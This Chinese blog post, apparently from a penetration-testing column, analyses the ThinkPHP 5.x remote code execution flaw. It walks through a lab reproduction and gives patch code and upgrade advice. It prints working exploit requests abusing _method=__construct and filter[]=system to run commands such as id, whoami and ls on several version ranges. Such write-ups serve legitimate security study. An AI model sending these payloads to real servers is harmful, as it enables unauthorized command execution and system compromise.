ThinkPHP 5.x RCE 漏洞分析与利用总结

最新推荐文章于 2024-08-05 00:00:00 发布
最新推荐文章于 2024-08-05 00:00:00 发布
阅读量4k 收藏 2
点赞数 3
分类专栏: 渗透测试篇
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41438728/article/details/109847661
版权

ThinkPHP 5.x RCE 漏洞分析与利用总结

一、ThinkPHP 5.0.23 rce漏洞复现与总结

漏洞复现

thinkphp 5.0.23 rce
thinkphp 5.0.23 rce源码下载:

github:https://github.com/top-think/framework/tree/v5.0.23

影响版本

ThinkPHP 5.0系列 < 5.0.23
ThinkPHP 5.1系列 < 5.1.31

安全版本

ThinkPHP 5.0系列 5.0.23
ThinkPHP 5.1系列 5.1.31

漏洞原理

ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。

漏洞利用

1.启动vulhub靶场,访问
在这里插入图片描述
2.抓包复现,完整的数据是:
注意:
修改GET 为POST;
添加Content-Type: application/x-www-form-urlencoded

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd

在这里插入图片描述

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls

在这里插入图片描述
3.完整数据包:

POST /index.php?s=captcha HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

手动修正

5.1版本

thinkphp/library/think/route/dispatch/Url.php  类的parseUrl方法,解析控制器后加上   添加
 if ($controller && !preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) {
     throw new HttpException(404, 'controller not exists:' . $controller);
 }

5.0版本

thinkphp/library/think/App.php  类的module方法的获取控制器的代码后面加上
if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) {
   throw new HttpException(404, 'controller not exists:' . $controller);
}

框架升级

进入到代码根目录 执行 composer update

目前thinkphp的 5.0(5.0.23) 以及 5.1(5.1.31) 的最新版本,已经修复此漏洞,建议大家项目都用目前最新版本。

二、ThinkPHP 5.x RCE 漏洞分析与利用总结

接下来将为大家进行漏洞分析以及对各个版本、场景下的利用进行详细的总结。
漏洞范围: <= 5.0.23、<= 5.1.32
5.0.x补丁:

https://github.com/top-think/framework/commit/4a4b5e64fa4c46f851b4004005bff5f3196de003

5.1.x补丁:

https://github.com/top-think/framework/commit/2454cebcdb6c12b352ac0acd4a4e6b25b31982e6

Payload总结
1、<= 5.0.13

1.	POST /?s=index/index
2.	s=whoami&_method=__construct&method=&filter[]=system

2、<= 5.0.23、5.1.0 <= 5.1.16
开启debug()

1.	POST /
2.	_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls -al

3、<= 5.0.23
需要captcha的method路由,如果存在其他method路由,也是可以将captcha换为其他。

1.	POST /?s=captcha HTTP/1.1
2.	_method=__construct&filter[]=system&server[REQUEST_METHOD]=whoami&method=get

4、5.0.0 <= version <= 5.1.32
error_reporting(0)关闭报错

1.	POST /
2.	c=exec&f=calc.exe&_method=filter

学习参考链接:

1、https://blog.csdn.net/wuxianbing2012/article/details/104897634?utm_medium=distribute.pc_relevant.none-task-blog-searchFromBaidu-1.control&depth_1-utm_source=distribute.pc_relevant.none-task-blog-searchFromBaidu-1.control
2、https://blog.csdn.net/dengzhasong7076/article/details/102139816?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-10.control&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-10.control
ERRORS团队


    ERRORS团队源于网络空间安全的兴趣爱好者共同组建,致力于从网络安全的各个层面维护国家网络空间安全,团队成员拥有专业的渗透测试技术、安全评估能力、逆向分析技巧以及丰富的项目经验和实战经验。该团队是一支年轻的有生命力的团队,旨在通过知识分享、技术探讨提升网络安全意识和专业技能。

加入我们:

ERRORS团队主页:  https://www.chihou.pro/

盒子团队申请:      https://www.vulbox.com/team/ERRORS

或者邮件联系:      chihou.pro@gmail.com

德古拉的杂货铺
关注
专栏目录
ThinkPHP 5.x RCE分析
0verWatch的博客
02-15 6156
第一次进行代码量这么大的分析,记录一下,个人感觉新手真的不适应这种,应该找点小一点的cms去分析,如果不懂MVC架构真的可能会懵。。。 前言 在分析这个之前还看了两篇tp5的RCE漏洞,这两个洞都是很相似的,都是利用一个可控的变量dispatch去实现到最后还是构造出回调函数,可以学习一下,感觉这里面的思路就是本文分析漏洞的来源 https://xz.aliyun.com/t/3845 https...
tomcat ajp协议安限制绕过漏洞_【高危安通告】Apache Tomcat 文件包含漏洞(CVE20201938)...
weixin_39826809的博客
12-01 148
↑ 点击上方蓝色字关注我们Apache与Tomcat都是Apache开源组织开发的用于处理HTTP服务的项目,两者都是免费的,都可以做为独立的Web服务器运行。Apache Tomcat 服务器存在文件包含漏洞,攻击者可利用漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件或源代码等。漏洞原因是由于Apache Tomcat AJP 协议不...
解密RCE漏洞:原理剖析、复现与代码审计实战
最新发布
2301_80064376的博客
08-05 932
在网络安领域,因其严重性和破坏力而备受关注。RCE漏洞允许攻击者在目标系统上执行任意代码,从而掌控整个系统,带来极大的安风险。理解RCE漏洞的工作原理,并掌握其复现与代码审计技巧,对于提升系统安性至关重要。本文将深入剖析RCE漏洞的原理,展示如何在实际环境中复现该漏洞,并提供详尽的代码审计方法。无论您是网络安初学者,还是资深开发者,都能从中获得实用的知识和技能。让我们一起解密RCE漏洞,提升我们的安防护能力。
tomcat ajp协议安限制绕过漏洞_漏洞预警 Apache Tomcat文件包含漏洞(CVE20201938)...
weixin_39897505的博客
12-01 178
漏洞背景Apache Tomcat是美国Apache软件基金会的Jakarta项目的一款轻量级免费的开放源代码的Web应用服务器,主要用于开发和调试JSP程序,在世界范围内被广泛使用。近日,CNVD公开了一个Apache Tomcat文件包含漏洞(CVE-2020-1938/CNVD-2020-10487),该漏洞利用AJP服务端口实现攻击,未开启AJP服务对外不受影响,攻击者可...
tomcat ajp协议安限制绕过漏洞_国家信息安漏洞共享平台发布Apache Tomcat漏洞公告...
weixin_39616880的博客
12-10 137
2月22日消息 国家信息安漏洞共享平台(CNVD)近日发布了一份关于 Apache Tomcat 存在文件包含漏洞的安公告,具体如下: 安公告编号:CNTA-2020-0004 2020 年 1 月 6 日,国家信息安漏洞共享平台(CNVD)收录了由北京长亭科技有限公司发现并报送的 Apache Tomcat 文件包含漏洞(CNVD-2020-10487,对应 CVE-2020-1938)...
tomcat ajp协议安限制绕过漏洞_Apache Tomcat发现重大漏洞,已提供解决方案
weixin_39736007的博客
12-10 190
2月20日,CNVD(国家信息安漏洞共享平台)公告知名Web应用服务器Apache Tomcat被爆存在文件包含漏洞,攻击者可在受影响的Apache Tomcat服务器上非法读取Web目录文件,甚至进一步执行任意代码,威胁信息安,该漏洞将波及球约8万台服务器。  Apache Tomcat 是一个免费的开源 Web 应用服务器,在中小型企业和个人开发用户中广泛应用。 由于Tomcat默认开启...
php5漏洞汇总,ThinkPHP 5.x RCE 漏洞分析利用总结
weixin_34931142的博客
03-19 1267
一、ThinkPHP 5.0.23 rce漏洞复现与总结漏洞复现thinkphp 5.0.23 rcethinkphp 5.0.23 rce源码下载:github:https://github.com/top-think/framework/tree/v5.0.23影响版本ThinkPHP 5.0系列 < 5.0.23ThinkPHP 5.1系列 < 5.1.31安版本ThinkPH...
ThinkPHP3.2.x RCE漏洞通报1
08-03
ThinkPHP3.2.x RCE漏洞通报】中提到的安问题涉及到ThinkPHP 3.2版本的一个严重远程代码执行漏洞。这个漏洞源于框架中的`assign`方法,该方法用于将变量传递给模板进行渲染。当攻击者能够控制`assign`方法的第一...
php request漏洞利用,ThinkPHP 5.x RCE 漏洞分析利用总结
weixin_39722921的博客
03-10 807
近日ThinkPHP出现由于变量覆盖而引起的RCE,其漏洞根本源于thinkphp/library/think/Request.php中method方法可以进行变量覆盖,通过覆盖类的核心属性filter导致rce,其攻击点较为多,有些还具有限制条件,另外由于种种部分原因,在利用上会出现一些问题。例如:1、大部分payload进入最后rce的函数是调用了call_user_func,其可控的也只有一...
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
### ThinkPHP 5.0.x/5.1....通过以上分析可以看出,ThinkPHP 5.0.x/5.1.x中的变量覆盖RCE漏洞是由于不安的数据处理和变量管理造成的。开发者应加强对框架内部实现的理解,并遵循最佳安实践,以减少类似的安风险。
tomcat ajp协议安限制绕过漏洞_未然公告 | Apache Tomcat AJP CVE20201938漏洞防御指导...
weixin_39589511的博客
12-01 305
Apache Tomcat发布了安补丁,修补了一个AJP相关的严重漏洞,编号为CVE-2020-1983。Tomcat是目前比较流行的Web应用服务器,其中AJP协议实现存在任意文件读取漏洞。当前公开利用代码已经在互联网发布,存在较高的攻击风险,请涉及的客户及时更新相关补丁或者采取防范措施。漏洞影响攻击者通过该漏洞能够达成以下攻击效果:-读取webapp下任意文件。- 如果服务器端同...
tomcat ajp协议安限制绕过漏洞_Aapache Tomcat AJP 文件包含漏洞
weixin_39838758的博客
12-01 193
Aapache Tomcat AJP 文件包含漏洞(CVE-2020-1938)复现 Java 是目前 Web 开发中最主流的编程语言,而 Tomcat 是当前最流行的 Java 中间件服务器之一,从初版发布到现在已经有二十多年历史,在世界范围内广泛使用。 Ghostcat(幽灵猫)是由长亭科技安研究员发现的存在于 Tomcat 中的安漏洞,由于 Tomcat AJP ...
tomcat ajp协议安限制绕过漏洞_Apache Tomcat存在文件包含漏洞
weixin_39992788的博客
12-01 360
网安引领时代,弥天点亮未来Tomcat简介Tomcat是Apache软件基金会Jakarta项目中的一个核心项目,作为目前比较流行的Web应用服务器,深受Java爱好者的喜爱,并得到了部分软件开发商的认可。Tomcat服务器是一个免费的开放源代码的Web应用服务器,被普遍使用在轻量级Web应用服务的构架中。近日,互联网曝光Apache Tomcat服务器中被发现存在文件包含漏洞,攻...
apache tomcat ajp协议安限制绕过漏洞_ApacheTomcatAjp漏洞(CVE20201938)漏洞复现
weixin_31894867的博客
01-18 1632
一、前言Apache Tomcat会开启AJP连接器,方便与其他Web服务器通过AJP协议进行交互。由于Tomcat本身也内含了HTTP服务器,因此也可以视作单独的Web服务器。此漏洞为文件包含漏洞,攻击者可利用漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件、源代码等。二、漏洞编号:cnvd-2020-10487cve-2020-193...
tomcat ajp协议安限制绕过漏洞_Apache Tomcat文件包含漏洞(CVE20201938)复现
weixin_39999586的博客
12-04 1010
一、漏洞背景2020年02月20日,国家信息安漏洞共享平台(CNVD)发布了关于Apache Tomcat文件包含漏洞(CVE-2020-1938/CNVD-2020-10487)的安公告。Tomcat作为一款免费开源轻量级的web应用服务器,广泛应用于并发量不是很高的场合,Tomact默认端口8080用于处理http请求,Tomcat会监听AJP连接器的8009端口,用于与其他We...
tomcat ajp协议安限制绕过漏洞_Apache Tomcat文件包含漏洞分析
weixin_39918928的博客
11-29 677
更多安资讯和分析文章请关注启明星辰ADLab微信公众号及官方网站(adlab.venustech.com.cn)一、漏洞概述2020年2月20日,国家信息安漏洞共享平台(CNVD)发布关于Apache Tomcat的安公告,Apache Tomcat文件包含漏洞(CNVD-2020-10487,对应CVE-2020-1938)。Tomcat AJP协议由于存在实现缺陷导致相关参数可...
tomcat ajp协议安限制绕过漏洞_Apache Tomcat文件包含漏洞(CVE20201938)安通告
weixin_39746382的博客
12-01 466
漏洞综述关于Apache TomcatTomcat是Apache软件基金会Jakarta 项目中的一个核心项目,作为目前比较流行的Web应用服务器,深受Java爱好者的喜爱,并得到了部分软件开发商的认可。Tomcat服务器是一个免费的开放源代码的Web应用服务器,被普遍使用在轻量级Web应用服务的构架中。2月20日,国家信息安漏洞共享平台(CNVD)发布了Apache Tomcat文件...
ppt修复无法读取_CVE20201938 Tomcat 文件读取/包含漏洞复现
weixin_39975900的博客
12-01 654
0X1漏洞概述日前,长亭科技安研究人员球首次发现了一个存在于流行服务器 Tomcat 中的文件读取/包含漏洞,并第一时间提交厂商修复。2月14日,Apache Tomcat 官方发布安更新版本,修复漏洞。2月20日,国家信息安漏洞共享平台(CNVD)发布安公告,该漏洞综合评级为高危,漏洞编号为CNVD-2020-10487,CVE 编号 CVE-2020-1938。漏洞影响...
thinkphp3.2.x rce
12-18
ThinkPHP是一个开源的PHP开发框架,它的版本3.2.x是一个老版本,存在远程命令执行(RCE漏洞。这个漏洞允许攻击者通过构造恶意请求来执行任意的系统命令,从而获得对应用服务器的完控制权限。 这个漏洞的原因是在ThinkPHP 3.2.x版本的核心代码中没有对用户的输入进行充分的过滤和校验。攻击者可以利用这个漏洞来执行各种恶意操作,比如上传恶意文件、修改数据库内容或者获取系统敏感信息等。 为了利用这个漏洞,攻击者需要构造一个特殊的请求,其中包含可执行的系统命令。然后将这个请求发送到受影响的应用程序的漏洞点上。当应用程序在处理这个请求时,会将其中的系统命令当作可执行代码来执行,最终导致攻击者获取对应用服务器的控制权限。 为了修复这个漏洞,用户可以升级到最新版本ThinkPHP框架。在最新版本中,开发者已经修复了这个漏洞,并加强了对用户输入的过滤和校验。此外,用户还可以根据自己的需求对应用程序进行进一步的安加固,比如限制上传文件的类型和大小,对用户输入进行严格的过滤和校验等。 总之,ThinkPHP 3.2.x版本存在远程命令执行漏洞,攻击者可以通过构造恶意请求来执行任意的系统命令。为了修复这个漏洞,用户可以升级到最新版本ThinkPHP框架,并加强应用程序的安加固措施。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值